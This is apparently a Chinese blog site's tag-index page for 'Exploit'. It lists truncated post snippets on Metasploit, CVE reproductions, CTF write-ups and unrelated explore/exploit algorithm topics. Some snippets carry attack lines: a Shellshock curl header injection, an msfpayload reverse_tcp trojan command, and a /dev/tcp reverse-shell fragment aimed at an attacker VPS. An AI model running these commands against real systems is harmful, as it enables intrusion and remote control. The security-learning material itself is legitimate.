Exploit

kali下CVE_2017_7442利用实验

参考:https://www.exploit-db.com/exploits/42418/https://www.youtube.com/watch?
怀揣梦想的大鸡腿·2018-02-28 09:54

shellshock漏洞利用

exploit:curl-H'x:(){:;};a='/bin/mkdir/var/www/.ssh';echo"a:$a"''http://www.example.com/cgi-bin/test.cgi
怀揣梦想的大鸡腿·2018-02-28 09:01

怎么过一个没有遗憾的人生?探索/利用算法

生活中总会碰到,需要决定是探索(Explore)还是利用(Exploit)的场景。
坂本龙一·2018-02-19 21:17

Kali Linux工具集简介 - SET - 钓鱼网站

MetasploitBrowserExploit方法将利用通过iframe选择Metasplo
lendq·2018-02-13 12:56

MSF学习笔记(11)

搬迁到Minggle’Blog###本地提权漏洞检测meterpreter>runpost/multi/recon/local_exploit_suggester###迁移到指定进程migrate-Nexplorer.exe
tianyazm·2018-02-12 10:01

Kali Linux工具集简介 - w3af

其有控制台和界面俩种使用方式只讨论界面简介:其主要功能分为:漏洞挖掘(discovery)漏洞分析(audit)漏洞匹配(grep)漏洞利用(exploit)文件输出(output)Mangle暴力破解
lendq·2018-02-11 23:18

msf web_delivery模块攻击(win7以上通杀)

applocker_bypass_server1.打开神器metasploit,终端输入msfconsole2.搜索web_delivery模块,searchweb_delivery3.使用命令useexploit
张德亮·2018-01-23 22:09

msf web_delivery模块攻击(win7以上通杀)

applocker_bypass_server1.打开神器metasploit,终端输入msfconsole2.搜索web_delivery模块,searchweb_delivery3.使用命令useexploit
张德亮·2018-01-23 22:09

漏洞ms08_067的复现

一切显得理所当然一样,,,这根本不能用于实际,,首先是metasploit的使用:关于工具的使用,也发现了两种不同的方法,依次列举1.0:搜索方法:searchms08_067可以看到有一个方法然后使用这个方法:useexploit
云子墨·2018-01-23 18:59

metasploit iis6.0溢出远程代码执行漏洞

192.168.0.106本机ip:192.168.0.105下载这次的exp:cve-2017-7269将exp复制到/usr/share/metasploit-framework/modules/exploits
cs_xiaoqiang·2018-01-23 00:24

MAB问题

##OptimalExploration-ExploitationinaMulti-Armed-BanditProblemwithNon-stationaryRewards在一个多重赌博机的匪徒(MAB
Weiquan_·2018-01-20 23:30

msf

showexploitshowpayloadmsf使用数据库加快搜索,不然每次都等半天servicepostgresqlstartmsfdbreinitmsf>db_rebuild_cache需要等待几分钟查询漏洞对应的模块
Khazix·2018-01-18 09:00

MYSQL提权总结

一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQLWindowsRemoteSystemLevelExploit(Stuxnettechnique)0day)
kuiguowei·2018-01-16 09:11

论文学习:Explore and Exploit

论文学习:ExploreandExploit前言前阵子读了一篇KDD2017的论文”APracticalExplorationSystemforSearchAdvertising”,是有关E&E算法的,
legendavid·2018-01-09 16:33

Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)

原文链接:http://www.cnblogs.com/xishaonian/p/8145189.html2.1摘要2.1.1漏洞介绍漏洞名称:ExploitingNode.jsdeserializationbugforRemoteCodeExecution
aiquan9342·2017-12-29 16:00

The Password Reset MitM Attack 翻译 (谷歌)密码重置中间人攻击

ThePasswordResetMitMAttackAbstract—WepresentthepasswordresetMitM(PRMitM)attackandshowhowitcanbeusedtotakeoveruseraccounts.ThePRMitMattackexploitsthesimilarityoftheregistrationandpasswordresetprocesses
kangyucheng·2017-12-27 14:27

推荐系统的Exploration Exploitation 问题

作为奖赏.但这个概率玩家并不知道.玩家的目标是通过一定的策略获得最大化的累积奖赏.探索exploration-only.将所有的机会均分给每个摇臂,根据每个摇臂各自的吐硬币频率,去近似它的吐硬币概率.利用exploitation-only
yichudu·2017-12-26 14:32

格式化字符串漏洞利用 七、工具

七、工具原文:ExploitingFormatStringVulnerabilities作者:[email protected]译者:飞龙日期:2001.9.1版本:v1.2一旦利用完成,或者甚至在利用开发过程中
布客飞龙·2017-12-06 17:04

基本命令

msfdbreinit重新初始化数据库root@kali:~#update-rc.dpostgresqlenable使postgresql数据库开机自启msf>searchname:smbcve:2015msf>useexploit
Instu·2017-12-06 13:50

将 mysql 查询结果输出到文件

直接用mysql命令[plain]viewplaincopy#连接本地数据库,用户名为gino密码为123456指定所连接的数据库为mysqlgino@gino-exploit:~$mysql-hlocalhost-ugino-p123456
haijiege·2017-12-01 17:26

BeEF新手记录

BeEf,TheBrowserExploitationFramework缩写,攻击者可以对目标进行攻击测试,攻击成功以后会加载浏览器劫持会话,它扩展了跨站漏洞的利用,能HOO
Oldbowleeeee·2017-11-29 20:32

Metasploit从入门到放弃系列教程 第三节 常用命令

msf>useexploit/windows/proxy/ccproxy_telnet_pingmsfexploit
xw-hacker·2017-11-29 17:49

.Net反序列化漏洞之BinaryFormatter

https://googleprojectzero.blogspot.com.es/2017/04/exploiting-net-managed-dcom.html.Net反序列化导致RCE的样例,有两点限制
fatshi·2017-11-28 15:35

利用msf生成后门拿shell

payloadwindows/meterpreter/reverse_tcp输入以下命令生成后门qq.exe然后将生成的qq.exe移到win7中,然后打开msfconsole使用该攻击模块监听useexploit
糖瓜不甜·2017-11-15 23:05

metasploit渗透测试

e.g.searchportscanuse…选择渗透攻击模块showpayloads查看与该攻击模块相兼容的攻击载荷setpayload…设置攻击载荷settarget设置目标showoptions查看需要设置的配置参数exploit
BigYellowHsw·2017-11-08 19:59

浏览器利用框架BeEF测试

0×00前言http://www.vuln.cn/6966BeEF,全称TheBrowserExploitationFramework,是一款针对浏览器的渗透测试工具。
gr9527·2017-11-07 14:10

mysql mof+metasploit反弹shell

1975985mysqlmof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网use exploit
z2pp·2017-10-25 15:07

通用PHP版Exploit框架编写

0×01前言无常规漏洞时代的到来,使得市面上目前很多流行的注入测试工具都无法胜任那些非常规的注入点,而脚本的灵活性可以很方便对这些非常规的注入点进行测试,最常见的应用莫过于通过脚本进行HTTP包的转发,配合注入测试工具进行注入的了。而今天想探讨的主要是PHP版的Exp的编写,直接通过脚本来达到注入或者批量GetShell的目的.0×02PHP的WinSock函数PHP的强大和易用性不用多说,他的扩
simeon2005·2017-10-24 15:24

bandit算法(1)--epsilon-Greedy Algorithm(附代码)

当然,要解释MBA,首先就得EE问题(Explore-Exploitdilemma)。什么是EE问题呢?这两个”E”,其中一个代表“exploit”,中文可译作“利用”;另一个代表“Explore”
aturbofly·2017-10-12 23:43

【图像】初识弱监督下的图像语义分割

对于基于深度学习的图像语义分割,最近读的两篇文章《BoxSup:exploitingboundingboxestosuperviseconvolutionalnetworksforsemanticsegmentation
lakerszjb·2017-10-12 22:35

babyheap 2017漏洞分析

直接拿http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html的完整exp分析吧这是0ctf2017的一道pwn题。
qq_35519254·2017-10-12 13:40

使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程

0x01实验环境攻击机:kalilinuxip:10.10.10.131目标机:windows2008R2ip:10.10.10.1320x02配置exploitmsf>useexploit/windows
D-river·2017-10-11 10:02

【安全牛学习笔记】选择和修改EXP

选择和修改EXP网公开的EXP代码选择可信赖的EXP源Exploit-dbSecruityFocusSearchsploit有能力修改EXP(Python、Perl、Ruby、C、C++...)www.securityfocus.com
安全牛课堂·2017-09-15 13:34

Words used when reading Redis documents

achievedadj.高度完美的v.实现,获得Redis------------------Redis-clirepresentationn.表示manipulatev.操纵compactvi.压缩,压紧n.协议,条约exploitv
放心飞吧·2017-09-13 12:19

web安全 XSS、CSRF 漏洞、SQL 注入漏洞,跳转漏洞

XSS用户浏览器在浏览被攻击的网站时执行了网页上的特定脚本;CaseA:HTMLDOM{{user_name}}Exploit:alert(1)Result:alert(1)CaseB:HTMLAttributeExploit
未来已来_feature·2017-09-06 22:52

乐固加固脱壳过程

它使用开源的Androidrootexploit工具在Android设备上获得root权限。事先说明,GooglePlay中找不到此恶意APP。恶意APP
houjingyi233·2017-09-03 17:51

CTF web题总结--绕过正则表达式

2.通过生成ip地址长整数绕过正则表达式,下载exploit脚本。3.通过tar命令将无后缀脚本打包,再用php命令执行Example:http://localhost/index.php?
zzxlinux·2017-08-30 19:45

Linux环境下netcat使用

Linux提权绝大部分都靠的是LocalExploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。
玄瞋·2017-08-27 10:05

Discriminative Correlation Filters (DCF)

DCFisalearningtechniquethatefficientlyexploitsallcyclicshiftsofthetrainingsa
dadadaplz·2017-08-18 21:54

《奥德赛》—第16章—Like Father, Like Son

(Telemachus,”Odysseus,manofexploits,urgedhisson,“it’swrongtomarvel,carriedawayinwondersoatsightofyourfatherherebeforeyoureyes
chuyamying·2017-08-17 15:59

Windows 内核漏洞学习—空指针解引用

原标题:WindowsKernelExploitation–NullPointerDereference原文地址:https://osandamalith.com/2017...由prison翻译整理,
anquan·2017-08-11 00:00

msf学习之木马

msfpayloadwindows/meterpreter/reverse_tcpLHOST=10.24.194.155LPORT=55555X>text.exe生成一个text.exe的木马文件msf>useexploit
fake_hydra·2017-07-29 14:38

Jenkins + OSChina CI 最简

Jenkins配置中打开Jenkins的跨域保护[UNCHECK]ManagePlugins-ConfigureGlobalSecurity-PreventCrossSiteRequestForgeryexploitsJenkins
fxp·2017-07-24 00:00

searchsploit使用攻略

1.1searchsploit简介ExploitDatabase(https://github.com/offensive-security/exploit-database)这是O
simeon2005·2017-07-08 15:22

提权辅助工具Windows-Exploit-Suggester

1提权辅助工具Windows-Exploit-Suggester1.1Windows-Exploit-Suggester简介1.简介Windows-Exploit-Suggester是受Linux_Exploit_Suggester
simeon2015·2017-07-04 22:20

浅谈CTF中命令执行与绕过的小技巧

空格绕过&/dev/tcp/xxxxxI(你的vps的公网ip)/80800>&1第二种是msf反向回连同样vps用msf监听vps的msf监听:useexploit/multi
qq_27446553·2017-06-29 19:12

强化学习之Q-learning简介

强化学习Q-learningQ-TableBellmanEquation算法实例Deep-Q-learningExperiencereplayExploration-Exploit
Young_Gy·2017-06-20 19:16

【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞

背景从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在过去的五月中,这个Exploit被多款恶意软件利用。
qq_27446553·2017-06-20 10:47

D-CTF Quals 2016 - Warm heap

原文地址:https://thegoonies.rocks/d-ctf-quals-2016-warm-heap-exploit/文件下载地址:https://github.com/BBS-Bill-Gates
qq_33528164·2017-06-18 16:12

commix命令执行利用工具

参考:http://www.hackingarticles.in/bwapp-command-injection-exploitation-using-commix-bypass-security/看着他就这么利用
caiqiiqi·2017-06-17 15:17
上一页 29 30 31 32 33 34 35 36 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他